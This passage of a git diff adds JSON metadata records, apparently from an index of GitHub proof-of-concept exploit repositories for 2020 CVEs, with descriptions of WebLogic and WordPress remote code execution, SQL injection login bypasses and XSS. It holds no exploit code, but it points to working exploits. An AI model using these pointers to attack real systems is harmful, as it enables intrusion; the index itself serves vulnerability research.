"https:\/\/github.com\/BLY-Coder\/Python-exploit-CVE-2020-25213", + "description": "Python exploit for RCE in Wordpress", + "fork": false, + "created_at": "2023-01-22T16:54:25Z", + "updated_at": "2024-08-12T20:29:26Z", + "pushed_at": "2023-03-13T13:32:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673716937, + "name": "Python-CVE-2020-25213", + "full_name": "E1tex\/Python-CVE-2020-25213", + "owner": { + "login": "E1tex", + "id": 134239936, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134239936?v=4", + "html_url": "https:\/\/github.com\/E1tex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/E1tex\/Python-CVE-2020-25213", + "description": "Python Interactive Exploit for WP File Manager Vulnerability. The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension.", + "fork": false, + "created_at": "2023-08-02T09:06:13Z", + "updated_at": "2024-11-08T04:40:46Z", + "pushed_at": "2023-08-02T10:41:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 728154421, + "name": "CVE-2020-25213", + "full_name": "Nguyen-id\/CVE-2020-25213", + "owner": { + "login": "Nguyen-id", + "id": 145361899, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145361899?v=4", + "html_url": "https:\/\/github.com\/Nguyen-id", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nguyen-id\/CVE-2020-25213", + "description": null, + "fork": false, + "created_at": "2023-12-06T10:47:11Z", + "updated_at": "2023-12-06T10:47:54Z", + "pushed_at": "2023-12-06T10:47:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25223.json b/2020/CVE-2020-25223.json new file mode 100644 index 0000000000..11880b29eb --- /dev/null +++ b/2020/CVE-2020-25223.json @@ -0,0 +1,95 @@ +[ + { + "id": 401020789, + "name": "sophucked", + "full_name": "darrenmartyn\/sophucked", + "owner": { + "login": "darrenmartyn", + "id": 49643587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4", + "html_url": "https:\/\/github.com\/darrenmartyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darrenmartyn\/sophucked", + "description": "CVE-2020-25223", + "fork": false, + "created_at": "2021-08-29T11:08:53Z", + "updated_at": "2022-05-19T11:27:41Z", + "pushed_at": "2021-09-13T21:24:03Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 404784498, + "name": "CVE-2020-25223", + "full_name": "twentybel0w\/CVE-2020-25223", + "owner": { + "login": "twentybel0w", + "id": 30179317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30179317?v=4", + "html_url": "https:\/\/github.com\/twentybel0w", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twentybel0w\/CVE-2020-25223", + "description": null, + "fork": false, + "created_at": "2021-09-09T15:58:08Z", + "updated_at": "2022-04-12T05:57:11Z", + "pushed_at": "2021-09-11T18:13:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 878838539, + "name": "poc-CVE-2020-25223", + "full_name": "reneww\/poc-CVE-2020-25223", + "owner": { + "login": "reneww", + "id": 186378596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186378596?v=4", + "html_url": "https:\/\/github.com\/reneww", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reneww\/poc-CVE-2020-25223", + "description": null, + "fork": false, + "created_at": "2024-10-26T08:45:39Z", + "updated_at": "2024-11-28T15:01:34Z", + "pushed_at": "2024-10-26T08:50:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25265.json b/2020/CVE-2020-25265.json new file mode 100644 index 0000000000..b8507d5044 --- /dev/null +++ b/2020/CVE-2020-25265.json @@ -0,0 +1,33 @@ +[ + { + "id": 296434593, + "name": "CVE-2020-25265-25266", + "full_name": "refi64\/CVE-2020-25265-25266", + "owner": { + "login": "refi64", + "id": 1690697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1690697?v=4", + "html_url": "https:\/\/github.com\/refi64", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/refi64\/CVE-2020-25265-25266", + "description": null, + "fork": false, + "created_at": "2020-09-17T20:25:02Z", + "updated_at": "2020-12-08T02:57:29Z", + "pushed_at": "2020-12-08T02:57:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25270.json b/2020/CVE-2020-25270.json new file mode 100644 index 0000000000..63b5e69326 --- /dev/null +++ b/2020/CVE-2020-25270.json @@ -0,0 +1,33 @@ +[ + { + "id": 297838971, + "name": "CVE-2020-25270", + "full_name": "Ko-kn3t\/CVE-2020-25270", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25270", + "description": "PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City", + "fork": false, + "created_at": "2020-09-23T03:16:08Z", + "updated_at": "2020-09-27T13:34:18Z", + "pushed_at": "2020-09-23T03:22:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25271.json b/2020/CVE-2020-25271.json new file mode 100644 index 0000000000..2dcfb1e2db --- /dev/null +++ b/2020/CVE-2020-25271.json @@ -0,0 +1,33 @@ +[ + { + "id": 297840535, + "name": "CVE-2020-25271", + "full_name": "Ko-kn3t\/CVE-2020-25271", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25271", + "description": null, + "fork": false, + "created_at": "2020-09-23T03:24:20Z", + "updated_at": "2020-09-23T03:49:17Z", + "pushed_at": "2020-09-23T03:49:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25272.json b/2020/CVE-2020-25272.json new file mode 100644 index 0000000000..8c7ce94b12 --- /dev/null +++ b/2020/CVE-2020-25272.json @@ -0,0 +1,33 @@ +[ + { + "id": 297850617, + "name": "CVE-2020-25272", + "full_name": "Ko-kn3t\/CVE-2020-25272", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25272", + "description": "Online Bus Booking System 1.0,there is XSS through the name parameter in book_now.php", + "fork": false, + "created_at": "2020-09-23T04:20:16Z", + "updated_at": "2020-09-27T13:37:22Z", + "pushed_at": "2020-09-23T04:28:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25273.json b/2020/CVE-2020-25273.json new file mode 100644 index 0000000000..274dab1461 --- /dev/null +++ b/2020/CVE-2020-25273.json @@ -0,0 +1,33 @@ +[ + { + "id": 297852230, + "name": "CVE-2020-25273", + "full_name": "Ko-kn3t\/CVE-2020-25273", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25273", + "description": "Online Bus Booking System 1.0, there is Authentication bypass on the Admin Login screen in admin.php via username or password SQL injection.", + "fork": false, + "created_at": "2020-09-23T04:29:29Z", + "updated_at": "2020-09-26T16:07:01Z", + "pushed_at": "2020-09-26T03:43:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25398.json b/2020/CVE-2020-25398.json new file mode 100644 index 0000000000..f3b1db1f42 --- /dev/null +++ b/2020/CVE-2020-25398.json @@ -0,0 +1,36 @@ +[ + { + "id": 279259540, + "name": "CVE-2020-25398", + "full_name": "h3llraiser\/CVE-2020-25398", + "owner": { + "login": "h3llraiser", + "id": 52741391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52741391?v=4", + "html_url": "https:\/\/github.com\/h3llraiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3llraiser\/CVE-2020-25398", + "description": "CSV Injection exists in InterMind iMind Server through 3.13.65 via the csv export functionality.", + "fork": false, + "created_at": "2020-07-13T09:37:11Z", + "updated_at": "2020-11-05T15:00:19Z", + "pushed_at": "2020-11-05T10:17:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code-execution", + "csv-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25399.json b/2020/CVE-2020-25399.json new file mode 100644 index 0000000000..524ed5aa0c --- /dev/null +++ b/2020/CVE-2020-25399.json @@ -0,0 +1,36 @@ +[ + { + "id": 279259641, + "name": "CVE-2020-25399", + "full_name": "h3llraiser\/CVE-2020-25399", + "owner": { + "login": "h3llraiser", + "id": 52741391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52741391?v=4", + "html_url": "https:\/\/github.com\/h3llraiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3llraiser\/CVE-2020-25399", + "description": "Stored XSS in InterMind iMind Server through 3.13.65 allows any user to hijack another user's session by sending a malicious file in the chat.", + "fork": false, + "created_at": "2020-07-13T09:37:38Z", + "updated_at": "2020-11-05T15:00:40Z", + "pushed_at": "2020-11-05T10:43:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "session-hijacking", + "xss" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2546.json b/2020/CVE-2020-2546.json new file mode 100644 index 0000000000..a06c973013 --- /dev/null +++ b/2020/CVE-2020-2546.json @@ -0,0 +1,33 @@ +[ + { + "id": 244411621, + "name": "CVE_2020_2546", + "full_name": "hktalent\/CVE_2020_2546", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE_2020_2546", + "description": "CVE-2020-2546,CVE-2020-2915 CVE-2020-2801 CVE-2020-2798 CVE-2020-2883 CVE-2020-2884 CVE-2020-2950 WebLogic T3 payload exploit poc python3,", + "fork": false, + "created_at": "2020-03-02T15:54:46Z", + "updated_at": "2024-08-12T19:58:18Z", + "pushed_at": "2023-03-05T12:40:36Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 131, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25478.json b/2020/CVE-2020-25478.json new file mode 100644 index 0000000000..04f6906cd4 --- /dev/null +++ b/2020/CVE-2020-25478.json @@ -0,0 +1,33 @@ +[ + { + "id": 534132363, + "name": "CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack", + "full_name": "santokum\/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack", + "owner": { + "login": "santokum", + "id": 5785743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5785743?v=4", + "html_url": "https:\/\/github.com\/santokum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/santokum\/CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack", + "description": "ASUS RT-AC87U TFTP is vulnerable to Denial of Service(DoS) attack", + "fork": false, + "created_at": "2022-09-08T09:04:27Z", + "updated_at": "2022-09-08T09:12:06Z", + "pushed_at": "2022-09-08T09:11:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25487.json b/2020/CVE-2020-25487.json new file mode 100644 index 0000000000..9502c7bf00 --- /dev/null +++ b/2020/CVE-2020-25487.json @@ -0,0 +1,33 @@ +[ + { + "id": 297710280, + "name": "CVE-2020-25487", + "full_name": "Ko-kn3t\/CVE-2020-25487", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25487", + "description": "SQL injection Vulnerability in Zoo Management System", + "fork": false, + "created_at": "2020-09-22T16:37:46Z", + "updated_at": "2020-09-23T09:31:19Z", + "pushed_at": "2020-09-22T16:41:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25488.json b/2020/CVE-2020-25488.json new file mode 100644 index 0000000000..a930314171 --- /dev/null +++ b/2020/CVE-2020-25488.json @@ -0,0 +1,33 @@ +[ + { + "id": 297708009, + "name": "CVE-2020-25488", + "full_name": "Ko-kn3t\/CVE-2020-25488", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25488", + "description": "Login Bypass in Zoo Management System V1.0", + "fork": false, + "created_at": "2020-09-22T16:28:34Z", + "updated_at": "2020-09-22T17:06:49Z", + "pushed_at": "2020-09-22T17:06:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25498.json b/2020/CVE-2020-25498.json new file mode 100644 index 0000000000..84c881e984 --- /dev/null +++ b/2020/CVE-2020-25498.json @@ -0,0 +1,33 @@ +[ + { + "id": 327073339, + "name": "CVE-2020-25498", + "full_name": "the-girl-who-lived\/CVE-2020-25498", + "owner": { + "login": "the-girl-who-lived", + "id": 42164898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42164898?v=4", + "html_url": "https:\/\/github.com\/the-girl-who-lived", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the-girl-who-lived\/CVE-2020-25498", + "description": "Stored XSS via CSRF in Beetel 777VR1 Router ", + "fork": false, + "created_at": "2021-01-05T17:38:52Z", + "updated_at": "2021-01-09T06:55:14Z", + "pushed_at": "2021-01-05T19:48:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2551.json b/2020/CVE-2020-2551.json new file mode 100644 index 0000000000..2af1dcff60 --- /dev/null +++ b/2020/CVE-2020-2551.json @@ -0,0 +1,302 @@ +[ + { + "id": 233997916, + "name": "weblogicScanner", + "full_name": "0xn0ne\/weblogicScanner", + "owner": { + "login": "0xn0ne", + "id": 16507416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16507416?v=4", + "html_url": "https:\/\/github.com\/0xn0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xn0ne\/weblogicScanner", + "description": "weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14750、CVE-2020-14882、CVE-2020-14883", + "fork": false, + "created_at": "2020-01-15T04:26:29Z", + "updated_at": "2024-11-28T15:07:29Z", + "pushed_at": "2023-11-24T09:21:56Z", + "stargazers_count": 2014, + "watchers_count": 2014, + "has_discussions": true, + "forks_count": 339, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2016-0638", + "cve-2016-3510", + "cve-2017-10271", + "cve-2017-3248", + "cve-2018-2893", + "cve-2018-2894", + "cve-2018-3191", + "cve-2018-3245", + "cve-2018-3252", + "cve-2019-2618", + "cve-2019-2725", + "cve-2019-2729", + "cve-2019-2888", + "cve-2019-2890", + "cve-2020-14750", + "cve-2020-14882", + "cve-2020-14883", + "cve-2020-2551", + "cve-2020-2555", + "cve-2020-2883" + ], + "visibility": "public", + "forks": 339, + "watchers": 2014, + "score": 0, + "subscribers_count": 37 + }, + { + "id": 234696172, + "name": "CVE-2020-2551", + "full_name": "jas502n\/CVE-2020-2551", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jas502n\/CVE-2020-2551", + "description": "Weblogic RCE with IIOP", + "fork": false, + "created_at": "2020-01-18T07:08:06Z", + "updated_at": "2024-08-12T19:56:45Z", + "pushed_at": "2020-01-18T07:14:34Z", + "stargazers_count": 79, + "watchers_count": 79, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 79, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 234901198, + "name": "CVE-2020-2551", + "full_name": "hktalent\/CVE-2020-2551", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2020-2551", + "description": "how detect CVE-2020-2551 poc exploit python Weblogic RCE with IIOP", + "fork": false, + "created_at": "2020-01-19T13:01:32Z", + "updated_at": "2024-10-25T07:43:46Z", + "pushed_at": "2023-03-05T12:40:59Z", + "stargazers_count": 211, + "watchers_count": 211, + "has_discussions": false, + "forks_count": 49, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 49, + "watchers": 211, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 243717144, + "name": "CVE-2020-2551", + "full_name": "Y4er\/CVE-2020-2551", + "owner": { + "login": "Y4er", + "id": 40487319, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40487319?v=4", + "html_url": "https:\/\/github.com\/Y4er", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4er\/CVE-2020-2551", + "description": "Weblogic IIOP CVE-2020-2551", + "fork": false, + "created_at": "2020-02-28T08:46:21Z", + "updated_at": "2024-11-01T02:37:51Z", + "pushed_at": "2020-04-07T03:32:24Z", + "stargazers_count": 333, + "watchers_count": 333, + "has_discussions": false, + "forks_count": 78, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 78, + "watchers": 333, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 264347023, + "name": "weblogicPoc", + "full_name": "zzwlpx\/weblogicPoc", + "owner": { + "login": "zzwlpx", + "id": 14900766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14900766?v=4", + "html_url": "https:\/\/github.com\/zzwlpx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zzwlpx\/weblogicPoc", + "description": "Weblogic Vuln POC EXP cve-2020-2551 cve-2020-2555 cve-2020-2883 ,。。。", + "fork": false, + "created_at": "2020-05-16T03:01:32Z", + "updated_at": "2024-08-27T01:36:01Z", + "pushed_at": "2022-08-07T06:36:30Z", + "stargazers_count": 90, + "watchers_count": 90, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 90, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 266458849, + "name": "Weblogic-CVE-2020-2551-To-Internet", + "full_name": "Dido1960\/Weblogic-CVE-2020-2551-To-Internet", + "owner": { + "login": "Dido1960", + "id": 44106495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44106495?v=4", + "html_url": "https:\/\/github.com\/Dido1960", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dido1960\/Weblogic-CVE-2020-2551-To-Internet", + "description": "CVE-2020-2551 POC to use in Internet", + "fork": false, + "created_at": "2020-05-24T02:56:12Z", + "updated_at": "2024-08-12T20:01:49Z", + "pushed_at": "2020-05-26T06:58:10Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 292301795, + "name": "CVE-2020-2551", + "full_name": "DaMinGshidashi\/CVE-2020-2551", + "owner": { + "login": "DaMinGshidashi", + "id": 46160547, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46160547?v=4", + "html_url": "https:\/\/github.com\/DaMinGshidashi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DaMinGshidashi\/CVE-2020-2551", + "description": "Use shell to build weblogic debug environment for CVE-2020-2551", + "fork": false, + "created_at": "2020-09-02T14:11:15Z", + "updated_at": "2020-09-02T14:11:18Z", + "pushed_at": "2020-04-06T10:59:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 472179800, + "name": "CVE-2020-2551", + "full_name": "LTiDi2000\/CVE-2020-2551", + "owner": { + "login": "LTiDi2000", + "id": 68416745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68416745?v=4", + "html_url": "https:\/\/github.com\/LTiDi2000", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LTiDi2000\/CVE-2020-2551", + "description": null, + "fork": false, + "created_at": "2022-03-21T03:58:29Z", + "updated_at": "2022-03-21T03:58:29Z", + "pushed_at": "2022-03-21T03:58:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499165660, + "name": "CVE-Exploit", + "full_name": "0xAbbarhSF\/CVE-Exploit", + "owner": { + "login": "0xAbbarhSF", + "id": 67552744, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4", + "html_url": "https:\/\/github.com\/0xAbbarhSF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-Exploit", + "description": "CVE-2020-2551 Exploiter ", + "fork": false, + "created_at": "2022-06-02T14:20:43Z", + "updated_at": "2024-08-12T20:23:47Z", + "pushed_at": "2022-06-02T14:23:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25514.json b/2020/CVE-2020-25514.json new file mode 100644 index 0000000000..b9cc7ef5f9 --- /dev/null +++ b/2020/CVE-2020-25514.json @@ -0,0 +1,33 @@ +[ + { + "id": 297713936, + "name": "CVE-2020-25514", + "full_name": "Ko-kn3t\/CVE-2020-25514", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25514", + "description": "Login Bypass in Simple Library Management System 1.0", + "fork": false, + "created_at": "2020-09-22T16:52:15Z", + "updated_at": "2020-09-22T16:58:44Z", + "pushed_at": "2020-09-22T16:58:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25515.json b/2020/CVE-2020-25515.json new file mode 100644 index 0000000000..702fec2861 --- /dev/null +++ b/2020/CVE-2020-25515.json @@ -0,0 +1,33 @@ +[ + { + "id": 297721482, + "name": "CVE-2020-25515", + "full_name": "Ko-kn3t\/CVE-2020-25515", + "owner": { + "login": "Ko-kn3t", + "id": 57166441, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57166441?v=4", + "html_url": "https:\/\/github.com\/Ko-kn3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ko-kn3t\/CVE-2020-25515", + "description": "Unrestricted File Upload in Simple Library Management System 1.0", + "fork": false, + "created_at": "2020-09-22T17:23:21Z", + "updated_at": "2022-11-11T00:45:09Z", + "pushed_at": "2022-11-11T10:50:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25518.json b/2020/CVE-2020-25518.json new file mode 100644 index 0000000000..02ea8169cd --- /dev/null +++ b/2020/CVE-2020-25518.json @@ -0,0 +1,33 @@ +[ + { + "id": 294713889, + "name": "wordpress_DoS", + "full_name": 